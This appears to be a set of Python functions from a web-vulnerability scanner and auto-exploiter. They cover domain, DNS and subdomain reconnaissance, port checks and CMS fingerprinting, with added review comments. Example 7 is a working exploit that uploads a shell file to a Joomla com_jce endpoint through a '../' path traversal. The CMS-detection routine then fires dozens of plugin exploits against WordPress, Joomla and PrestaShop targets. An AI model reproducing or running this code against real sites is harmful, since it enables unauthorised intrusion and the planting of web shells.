Example #1
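    def web_host(self):
        """Print hosting details for ``self.url``.

        Looks up the domain creation date through the payapi.io domain-age
        endpoint, resolves the host name to an IPv4 address, then prints
        selected fields of the ipinfo.io JSON record for that address.
        Nothing is returned; all results go to stdout.

        The IP lookup only runs when the creation date was found. Errors
        raised inside that step are reported as a "Parse Error" line, while
        a failure of the first HTTP request propagates to the caller.
        """
        host = hostd(self.url)
        age_url = "https://input.payapi.io/v1/api/fraud/domain/age/" + host
        # The second positional argument of requests.get() is `params`, so the
        # headers must be passed by keyword or they end up in the query string.
        age_page = requests.get(age_url, headers=self.headers).text
        # group(1) stops at the first '-', i.e. the leading part of the date.
        created = re.search(r'Date: (.+?)-(.+?)', age_page)
        try:
            if created:
                print(' {0} Domain Created on : {1}'.format(
                    good, created.group(1)))
                ip = socket.gethostbyname(host)
                # The label says CloudFlare, but this is simply whatever
                # address the name resolves to.
                print(' {0} CloudFlare IP : {1}'.format(good, ip))
                # HTTPS so the lookup and its answer are not sent in clear text.
                ipinfo = "https://ipinfo.io/" + ip + "/json"
                gather = requests.get(ipinfo, headers=self.headers).text

                fields = (
                    ('Country', r'country\": \"(.+?)\"'),
                    ('Region', r'region\": \"(.+?)\"'),
                    ('Timezone', r'timezone\": \"(.+?)\"'),
                    ('Postal', r'postal\": \"(.+?)\"'),
                    ('Org', r'org\": \"(.+?)\"'),
                    ('Location', r'loc\": \"(.+?)\"'),
                )
                for label, pattern in fields:
                    self.match_printer(label, self.match_info(pattern, gather))
        except Exception as err:
            print(' {0} Parse Error : {1}'.format(bad, err))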
Example #2
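def domain_info(url):
    """Print the host records dnsdumpster.com lists for the domain of ``url``.

    Loads the dnsdumpster.com landing page to read its CSRF token, submits
    the domain through the site's form and prints one "SubDomain / IP" entry
    per row of the fourth HTML table of the answer. Nothing is returned.

    The function stops with a message instead of raising when the token or
    the expected table is missing from the page.
    """
    domain = hostd(url)
    dnsdumpster_url = 'https://dnsdumpster.com/'
    # One session for both requests instead of a throw-away session per call.
    session = requests.Session()
    landing = session.get(dnsdumpster_url).text
    token_match = re.search(r"name='csrfmiddlewaretoken' value='(.*?)'",
                            landing)
    if token_match is None:
        # Page layout changed or the request was blocked: nothing to submit.
        print(' %s CSRF token not found on dnsdumpster.com' % que)
        return
    csrf_token = token_match.group(1)
    response = session.post(dnsdumpster_url,
                            cookies={'csrftoken': csrf_token},
                            data={'csrfmiddlewaretoken': csrf_token,
                                  'targetip': domain},
                            headers={'Referer': 'https://dnsdumpster.com/'})
    # The original also downloaded the static map image and discarded it;
    # that unused request is dropped.
    if response.status_code != 200:
        return
    soup = BeautifulSoup(response.content, 'html.parser')
    tables = soup.findAll('table')
    if len(tables) < 4:
        # The host records are expected in the fourth table.
        print(' %s No host table in the dnsdumpster.com answer' % que)
        return
    res = {'domain': domain, 'dns_records': {'host': results(tables[3])}}
    print(' %s SubDomains' % que)
    for entry in res['dns_records']['host']:
        print((
            " %s SubDomain : {domain} \n %s IP : {ip} \n %s----------------%s"
            .format(**entry) % (good, good, bannerblue, end)))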
Example #3
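def dnsdumper(url):
    """Print the DNS-server and MX records dnsdumpster.com lists for ``url``.

    Reads the CSRF token from the dnsdumpster.com landing page, submits the
    domain through the site's form and prints the rows of the first (DNS
    servers) and second (MX records) HTML tables of the answer. Nothing is
    returned.
    """
    domain = hostd(url)
    dnsdumpster_url = 'https://dnsdumpster.com/'
    session = requests.Session()
    landing = session.get(dnsdumpster_url).text
    token_match = re.search(r"name='csrfmiddlewaretoken' value='(.*?)'", landing)
    if token_match is None:
        # The original fell through and posted the form with a None token;
        # stop here, the form cannot be submitted without it.
        print(' %s Retrieved token: %s' % (info, None))
        return
    csrf_token = token_match.group(1)
    print(' %s Retrieved token: %s' % (info, csrf_token))
    response = session.post(dnsdumpster_url,
                            cookies={'csrftoken': csrf_token},
                            data={'csrfmiddlewaretoken': csrf_token,
                                  'targetip': domain},
                            headers={'Referer': 'https://dnsdumpster.com/'})
    # The original also downloaded the static map image and discarded it;
    # that unused request is dropped.
    if response.status_code != 200:
        return
    soup = BeautifulSoup(response.content, 'html.parser')
    tables = soup.findAll('table')
    if len(tables) < 2:
        # Both record tables are needed; an answer without them has no data.
        return
    res = {
        'domain': domain,
        'dns_records': {
            'dns': results(tables[0]),
            'mx': results(tables[1]),
        },
    }
    sections = (
        (' %s Search for DNS Servers', 'dns'),
        (' %s Search for MX Records ', 'mx'),
    )
    for heading, key in sections:
        print(heading % que)
        for entry in res['dns_records'][key]:
            print((" %s Host : {domain} \n %s IP : {ip} \n %s AS : {as} \n  %s----------------%s".format(**entry) % (good, good, good, bannerblue, end)))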
Example #4
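 def portscan(self):
     """Report whether ``self.port`` accepts a TCP connection on the host of ``self.url``.

     Does nothing when ``self.port`` is not set. The result line shows the
     port, its open/closed marker and the label ``portsobject`` holds for
     that port. ``connect_ex`` reports connection failures through its
     return code; name-resolution errors can still raise.
     """
     if not self.port:
         return
     # The context manager closes the socket; the original never released it.
     with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
         result = sock.connect_ex((hostd(self.url), self.port))
     status = portopen if result == 0 else portclose
     print(' {} {}                    {}   {}'.format(
         que, self.port, status, portsobject[self.port]))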
Example #5
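def dnsdumper(url):
    '''
    Print the DNS-server and MX records dnsdumpster.com lists for ``url``.

    Reads the CSRF token from the hidden ``csrfmiddlewaretoken`` input of the
    dnsdumpster.com landing page, submits the domain through the site's form
    and prints the rows of the first (DNS servers) and second (MX records)
    HTML tables of the answer. Nothing is returned.

    TLS certificates are verified (the requests default). The earlier
    ``verify=False`` accepted any certificate, so the token, the submitted
    domain and the printed records could be read or altered in transit.
    '''

    domain = hostd(url)
    dnsdumpster_url = 'https://dnsdumpster.com/'
    session = requests.Session()
    response = session.get(dnsdumpster_url)
    soup = BeautifulSoup(response.text, 'html.parser')
    # The original retried the same lookup inside `except AttributeError`,
    # which could not catch the IndexError an empty result list raises.
    token_field = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})
    csrf_token = token_field.get('value') if token_field is not None else None
    print(' %s Retrieved token: %s' % (info, csrf_token))
    if csrf_token is None:
        # Without the token the form cannot be submitted.
        return
    response = session.post(dnsdumpster_url,
                            cookies={'csrftoken': csrf_token},
                            data={'csrfmiddlewaretoken': csrf_token,
                                  'targetip': domain},
                            headers={'Referer': 'https://dnsdumpster.com/'})
    # The original also downloaded the static map image and discarded it;
    # that unused request is dropped.
    if response.status_code != 200:
        return
    soup = BeautifulSoup(response.content, 'html.parser')
    tables = soup.findAll('table')
    if len(tables) < 2:
        # Both record tables are needed; an answer without them has no data.
        return
    res = {
        'domain': domain,
        'dns_records': {
            'dns': results(tables[0]),
            'mx': results(tables[1]),
        },
    }
    sections = (
        (' %s Search for DNS Servers', 'dns'),
        (' %s Search for MX Records ', 'mx'),
    )
    for heading, key in sections:
        print(heading % que)
        for entry in res['dns_records'][key]:
            print((
                " %s Host : {domain} \n %s IP : {ip} \n %s AS : {as} \n  %s----------------%s"
                .format(**entry) % (good, good, good, bannerblue, end)))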
Example #6
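def webhosting_info(hostinfo):
    """Print hosting details for the module-level ``url``.

    Looks up the domain creation date through the payapi.io domain-age
    endpoint, resolves the host name to an IPv4 address and prints the
    fields of the ipinfo.io record for that address that the patterns below
    find. Nothing is returned.

    ``hostinfo`` is accepted for compatibility with existing callers but is
    not read; the target and the request headers come from the module-level
    ``url`` and ``headers``.
    """
    print (' %s Web Hosting Information' % (run))
    host = hostd(url)
    urldate = "https://input.payapi.io/v1/api/fraud/domain/age/" + host
    # The second positional argument of requests.get() is `params`, so the
    # headers must be passed by keyword or they end up in the query string.
    getinfo = requests.get(urldate, headers=headers).text
    # group(1) stops at the first '-', i.e. the leading part of the date.
    created = re.search(r'Date: (.+?)-(.+?)', getinfo)
    if created:
        print ( ' %s Domain Created on : %s' % (good, created.group(1)))
    try:
        ip = socket.gethostbyname(host)
        # The label says CloudFlare, but this is simply whatever address the
        # name resolves to.
        print ( ' %s CloudFlare IP : %s' % (good, ip))
        # HTTPS so the lookup and its answer are not sent in clear text.
        ipinfo = "https://ipinfo.io/" + ip + "/json"
        getipinfo = requests.get(ipinfo, headers=headers).text
        # (label, pattern) pairs, printed in this order when the pattern matches.
        # NOTE(review): the latitude pattern ends in a lazy group, so it can
        # capture one character at most - confirm the intended field format.
        fields = (
            ('Country', r'country\": \"(.+?)\"'),
            ('Region', r'region\": \"(.+?)\"'),
            ('Latitude', r'latitude: (.+?)'),
            ('Longitude', r'longitude\": \"(.+?)\"'),
            ('Timezone', r'timezone\": \"(.+?)\"'),
            ('Ans', r'ans\": \"(.+?)\"'),
            ('Org', r'org\": \"(.+?)\"'),
        )
        for label, pattern in fields:
            found = re.search(pattern, getipinfo)
            if found:
                print(' %s %s : %s' % (good, label, found.group(1)))
        print ("-----------------------------------------------")
    except Exception:
        # Best effort: resolution and lookup failures end in one message.
        print(' %s Error to get ip for this web ' % (bad))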
Example #7
def joomla_comjce(url, headers, timeout):
    """Probe the com_jce image-manager upload endpoint of ``url`` and print the outcome.

    Sends a multipart form upload of the local file ./shell/VulnX.gif to the
    com_jce ``imgmanager`` form handler, then requests ``<url>/VulnX.gif``
    and prints a one-line status depending on whether the literal text
    ``/image/gif/`` appears in that second response. Nothing is returned.

    Traces this leaves in a web server log, all visible in the code below:
    a request to index.php with ``option=com_jce`` and ``plugin=imgmanager``
    in the query string, an ``upload-dir`` form field holding a ``../``
    sequence, a fixed 2001-era Gecko User-Agent, and a follow-up GET for
    ``/VulnX.gif`` at the site root.
    """
    # NOTE(review): `host` is computed but not used in this function.
    host = hostd(url)
    # Overwrites the User-Agent in the caller's dict, so the change is
    # visible to whatever else uses the same `headers` object.
    headers[
        'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
    endpoint = url + "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"
    data = {
        'upload-dir': './../../',
        'upload-overwrite': 0,
        # NOTE(review): the file object opened here is never closed.
        'Filedata': [open('./shell/VulnX.gif', 'rb')],
        'action': 'Upload',
    }
    # vxpost is defined elsewhere; its return value is not inspected here.
    content = vxpost(endpoint, data, headers, timeout)
    path_shell = url + "/VulnX.gif"
    res = requests.get(path_shell, headers).text
    # The printed status is decided only by this text match on the response.
    matches = re.findall(re.compile(r'/image/gif/'), res)
    if matches:
        print(' %s Com Jce               %s    %s' %
              (que, vulnexploit, path_shell))
    else:
        print(' %s Com Jce               %s' % (que, failexploit))
Example #8
def detect_cms():
    """Guess the CMS behind the module-level ``url`` and run the selected steps for it.

    Three pages are fetched up front: ``url`` itself, ``url + '/smiley/1.gif'``
    and ``url + '/rss.xml'``. The bodies are matched against one regular
    expression per CMS in a fixed order (Joomla, Wordpress, Drupal,
    Prestashop, OpenCart, Magento, then two Lokomedia probes); the first
    pattern that matches decides the branch, and the final ``else`` reports
    "Unknown". The patterns are plain substrings of the page text, so the
    classification is only as reliable as those strings.

    Inside a branch, each step is gated on a module-level name that this
    function reads but does not define: ``webinfo``, ``domaininfo`` (or
    ``subdomains`` in the Lokomedia branches), ``cms``, ``scanports``,
    ``dnsdump`` and ``exploit``. All output goes to stdout; nothing is
    returned.
    """
    # NOTE(review): `headers` is passed positionally in the three calls below;
    # the second positional parameter of requests.get() is `params`, so the
    # values are sent as query-string parameters rather than HTTP headers.
    lm = url + '/smiley/1.gif'
    lm_content = requests.get(lm,headers).text
    lm2 = url + '/rss.xml'
    lm2_content = requests.get(lm2,headers).text
    content=requests.get(url,headers).text
#    try:

        ############################
        #                          #
        #         joomla           #
        #                          #
        ############################
    #joomla searching content to detect.
    if  re.search(re.compile(r'<script type=\"text/javascript\" src=\"/media/system/js/mootools.js\"></script>|/media/system/js/|com_content|Joomla!'), content):
        print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end))
        print ('------------------------------------------------')
        print (' %s looking for cms' % (que))
        print (' %s %sCMS :%s Joomla' % (good,W,end))
        print ('------------------------------------------------')
        #webinfo gathering argument
        if webinfo:
            webhosting_info(hostinfo)
        
        #domain gathering argument
        if domaininfo:
            print (' %s Starting searching for Subdomains' %(run))
            domain_info(url)
        
        # `cms` selects which information helpers run: 'version' or 'all'.
        if cms == 'version':
            print (' %s CMS informations gathering' %(run))
            joo_version(url,headers)
            print ("-----------------------------------------------")
        if cms == 'all':
            print (' %s CMS informations gathering' %(run))
            joo_version(url,headers)
            joo_user(url,headers)
            joo_template(url,headers)
            print ("-----------------------------------------------")
        #port to scan
        if scanports:
            print (' %s Scanning Ports' %(run))
            print (""" %s     PORTS                     %sSTATUS  %sPROTO"""%(W,W,W))
            portscan(hostd(url))
            print ("-----------------------------------------------")
        if dnsdump:
            print (' %s Starting DNS dump' %(run))
            dnsdumper(url)
            print ("-----------------------------------------------")
        #joomla_exploits imported from folder[./common/joomla_exploits.py]
        if exploit:
            print (' %s Check Vulnerability' %(run))
            print (""" %sNAME                      %sSTATUS  %sSHELL"""%(W,W,W))
            joomla_comjce(url,headers,timeout)
            joomla_comedia(url,headers,timeout)
            joomla_comjdownloads(url,headers,timeout)
            joomla_comjdownloads2(url,headers,timeout)
            joomla_fabrik2(url,headers,timeout)
            joomla_fabrik2_d(url,headers,timeout)
            joomla_foxcontact(url,headers,timeout)

        ############################
        #                          #
        #         Wordpress        #
        #                          #
        ############################
    #wordpress searching content to detect.
    elif re.search(re.compile(r'wp-content|wordpress|xmlrpc.php'), content):
        print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end))
        print ('------------------------------------------------')
        print (' %s looking for cms' % (que))
        print (' %s %sCMS :%s Wordpress' % (good,W,end))
        print ('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        if domaininfo:
            print (' %s Starting searching for Subdomains' %(run))
            domain_info(url)
        #wp_grab methods info from (folder)[./common/grapwp.py]
        if cms == 'version':
            print (' %s CMS informations gathering' %(run))
            wp_version(url,headers,grabinfo)
            print ("-----------------------------------------------")
        if cms == 'themes':
            print (' %s CMS informations gathering' %(run))
            wp_themes(url,headers,grabinfo)
            print ("-----------------------------------------------")
        if cms == 'user':
            print (' %s CMS informations gathering' %(run))
            wp_user(url,headers,grabinfo)
            print ("-----------------------------------------------")
        if cms == 'plugins':
            print (' %s CMS informations gathering' %(run))
            wp_plugin(url,headers,grabinfo)
            print ("-----------------------------------------------")
        if cms == 'all':
            print (' %s CMS informations gathering' %(run))
            wp_version(url,headers,grabinfo)
            wp_themes(url,headers,grabinfo)
            wp_user(url,headers,grabinfo)
            wp_plugin(url,headers,grabinfo)
            print ("-----------------------------------------------")
                #port to scan
        if scanports:
            print (' %s Scanning Ports' %(run))
            print (""" %sPORTS                     %sSTATUS  %sPROTO"""%(W,W,W))
            portscan(hostd(url))
            print ("-----------------------------------------------")
        if dnsdump:
            print (' %s Starting DNS dump' %(run))
            dnsdumper(url)
            print ("-----------------------------------------------")
        # vulnx -u http://example.com -e | vulnx -u http://example --exploit
        if exploit:
            print (' %s Check Vulnerability\n' %(run))
            print (""" %sNAME                      %sSTATUS  %sSHELL"""%(W,W,W))
            #wp_exploit methods from (folder)[./common/wp_exploits.py]
            wp_wysija(url,headers,vulnresults)
            wp_blaze(url,headers,vulnresults)
            wp_synoptic(url,headers,vulnresults)
            wp_catpro(url,headers,vulnresults)
            wp_cherry(url,headers,vulnresults)
            wp_dm(url,headers,vulnresults)
            wp_fromcraft(url,headers,vulnresults)
            wp_jobmanager(url,headers,vulnresults)
            wp_showbiz(url,headers,vulnresults)      
            wp_shop(url,headers,vulnresults)
            wp_powerzoomer(url,headers,vulnresults)
            wp_revslider(url,headers,vulnresults)
            wp_adsmanager(url,headers,vulnresults)
            wp_inboundiomarketing(url,headers,vulnresults)
            wp_adblockblocker(url,headers,vulnresults)
            wp_levoslideshow(url,headers,vulnresults)
            print ("-----------------------------------------------")

        ############################
        #                          #
        #          Drupal          #
        #                          #
        ############################
    #drupal searching content to detect.
    elif re.search(re.compile(r'Drupal|drupal|sites/all|drupal.org'), content):
        print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end))
        print ('------------------------------------------------')
        print (' %s looking for cms' % (que))
        print (' %s CMS : Drupal' % (good))
        print ('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        #domain gathering argument
        if domaininfo:
            print (' %s Starting searching for Subdomains' %(run))
            domain_info(url)
        if cms == 'version':
            print (' %s CMS informations gathering' %(run))
            drupal_version()
        if scanports:
            print (' %s Scanning Ports\n' %(run))
            print (""" %s     PORTS                     %sSTATUS  %sPROTO"""%(W,W,W))
            portscan(hostd(url))
            print ("-----------------------------------------------")
        if dnsdump:
            print (' %s Starting DNS dump ' %(run))
            dnsdumper(url)
            print ("-----------------------------------------------")
        # Only the table header is printed here; no check is called for Drupal.
        if exploit:
            print (' %s Check Vulnerability\n' %(run))
            print (""" %sNAME                      %sSTATUS  %sSHELL"""%(W,W,W))

        ############################
        #                          #
        #        Prestashop        #
        #                          #
        ############################
    #prestashop searching content to detect.
    elif re.search(re.compile(r'Prestashop|prestashop'), content):
        print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end))
        print ('------------------------------------------------')
        print (' %s looking for cms' % (que))
        print (' %s %sCMS :%s Prestashop' % (good,W,end))
        print ('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        #domain gathering argument
        if domaininfo:
            print (' %s Starting searching for Subdomains' %(run))
            domain_info(url)
        if cms == 'version':
            print (' %s CMS informations gathering' %(run))
            prestashop_version()
        if scanports:
            print (' %s Scanning Ports\n' %(run))
            print (""" %s     PORTS                     %sSTATUS  %sPROTO"""%(W,W,W))
            portscan(hostd(url))
            print ("-----------------------------------------------")
        if dnsdump:
            print (' %s Starting DNS dump ' %(run))
            dnsdumper(url)
            print ("-----------------------------------------------")
        if exploit:
            print (' %s Check Vulnerability\n' %(run))
            print (""" %sNAME                      %sSTATUS  %sSHELL"""%(W,W,W))
            columnadverts(url,headers)
            soopabanners(url,headers)
            vtslide(url,headers)
            simpleslideshow(url,headers)
            productpageadverts(url,headers)
            productpageadvertsb(url,headers)
            jro_homepageadvertise(url,headers)
            attributewizardpro(url,headers)
            oneattributewizardpro(url,headers)
            attributewizardpro_old(url,headers)
            attributewizardpro_x(url,headers)
            advancedslider(url,headers)
            cartabandonmentpro(url,headers)
            cartabandonmentpro_old(url,headers)
            videostab(url,headers)
            wg24themeadministration(url,headers)
            fieldvmegamenu(url,headers)
            wdoptionpanel(url,headers)
            pk_flexmenu(url,headers)
            nvn_export_orders(url,headers)
            tdpsthemeoptionpanel(url,headers)
            masseditproduct(url,headers)
        ############################
        #                          #
        #          OpenCart        #
        #                          #
        ############################
    #opencart searching content to detect.
    elif re.search(re.compile(r'route=product|OpenCart|route=common|catalog/view/theme'), content):
        print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end))
        print ('------------------------------------------------')
        print (' %s looking for cms' % (que))
        print (' %s CMS : OpenCart' % (good))
        print ('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        #domain gathering argument
        if domaininfo:
            print (' %s Starting searching for Subdomains' %(run))
            domain_info(url)
        # Only the heading is printed; no version helper is called for OpenCart.
        if cms == 'version':
            print (' %s CMS informations gathering' %(run))
        if scanports:
            print (' %s Scanning Ports\n' %(run))
            print (""" %s     PORTS                     %sSTATUS  %sPROTO"""%(W,W,W))
            portscan(hostd(url))
            print ("-----------------------------------------------")
        if dnsdump:
            print (' %s Starting DNS dump ' %(run))
            dnsdumper(url)
            print ("-----------------------------------------------")
        # Only the table header is printed here; no check is called for OpenCart.
        if exploit:
            print (' %s Check Vulnerability\n' %(run))
            print (""" %sNAME                      %sSTATUS  %sSHELL"""%(W,W,W))

        ############################
        #                          #
        #          Magento         #
        #                          #
        ############################
    #magento searching content to detect.
    elif re.search(re.compile(r'Log into Magento Admin Page|name=\"dummy\" id=\"dummy\"|Magento'), content):
        print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end))
        print ('------------------------------------------------')
        print (' %s looking for cms' % (que))
        print (' %s CMS : Magento' % (good))
        print ('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        #domain gathering argument
        if domaininfo:
            print (' %s Starting searching for Subdomains' %(run))
            domain_info(url)
        # Only the heading is printed; no version helper is called for Magento.
        if cms == 'version':
            print (' %s CMS informations gathering' %(run))
        if scanports:
            print (' %s Scanning Ports\n' %(run))
            print (""" %s     PORTS                     %sSTATUS  %sPROTO"""%(W,W,W))
            portscan(hostd(url))
            print ("-----------------------------------------------")
        if dnsdump:
            print (' %s Starting DNS dump ' %(run))
            dnsdumper(url)
            print ("-----------------------------------------------")
        # Only the table header is printed here; no check is called for Magento.
        if exploit:
            print (' %s Check Vulnerability' %(run))
            print (""" %sNAME                      %sSTATUS  %sSHELL"""%(W,W,W))

        ############################
        #                          #
        #         Lokomedia        #
        #                          #
        ############################
    #lokomedia searching content to detect.
        # NOTE(review): this print is still inside the Magento branch and is
        # not gated on `exploit`, so it runs whenever the Magento pattern matched.
        print (' %s Check Vulnerability' %(run))
    # First Lokomedia probe: the text 'image/gif' in the /smiley/1.gif response.
    elif re.search(re.compile(r'image/gif'), lm_content):
        print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end))
        print ('------------------------------------------------')
        print (' %s looking for cms' % (que))
        print (' %s CMS : Lokomedia' % (good))
        print ('------------------------------------------------')
        # NOTE(review): every other branch gates this step on `domaininfo`;
        # confirm that `subdomains` is defined at module level.
        if subdomains:
            print (' %s Starting searching for Subdomains' %(run))
            domain_info(url)
        print ('------------------------------------------------')
        if scanports:
            print (' %s Scanning Ports\n' %(run))
            print (""" %s  PORTS                     %sSTATUS  %sPROTO"""%(W,W,W))
            portscan(hostd(url))
            print ("-----------------------------------------------")
        if dnsdump:
            print (' %s Starting DNS dump ' %(run))
            dnsdumper(url)
            print ("-----------------------------------------------")
        # Printed unconditionally; no check is called for Lokomedia.
        print (' %s Check Vulnerability' %(run))
    # Second Lokomedia probe: the text 'lokomedia' in the /rss.xml response.
    elif re.search(re.compile(r'lokomedia'), lm2_content):
        print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end))
        print ('------------------------------------------------')
        print (' %s looking for cms' % (que))
        print (' %s CMS : Lokomedia' % (good))
        print ('------------------------------------------------')
        # NOTE(review): same `subdomains` / `domaininfo` mismatch as in the
        # first Lokomedia branch.
        if subdomains:
            print (' %s Starting searching for Subdomains' %(run))
            domain_info(url)
        if scanports:
            print (' %s Scanning Ports\n' %(run))
            print (""" %s  PORTS                     %sSTATUS  %sPROTO"""%(W,W,W))
            portscan(hostd(url))
            print ("-----------------------------------------------")
        if dnsdump:
            print (' %s Starting DNS dump ' %(run))
            dnsdumper(url)
            print ("-----------------------------------------------")
        # Printed unconditionally; no check is called for Lokomedia.
        print (' %s Check Vulnerability' %(run))

        ############################
        #                          #
        #          Unknown         #
        #                          #
        ############################
    #no cms detect
    else:
        print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end))
        print ('------------------------------------------------')
        print (' %s looking for cms' % (que))
        print (' %s CMS : Unknown' % (bad))
        print ('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        #domain gathering argument
        if domaininfo:
            print (' %s Starting searching for Subdomains' %(run))
            domain_info(url)
            print ("-----------------------------------------------")
        if dnsdump:
            print (' %s Starting DNS dump ' %(run))
            dnsdumper(url)
            print ("-----------------------------------------------")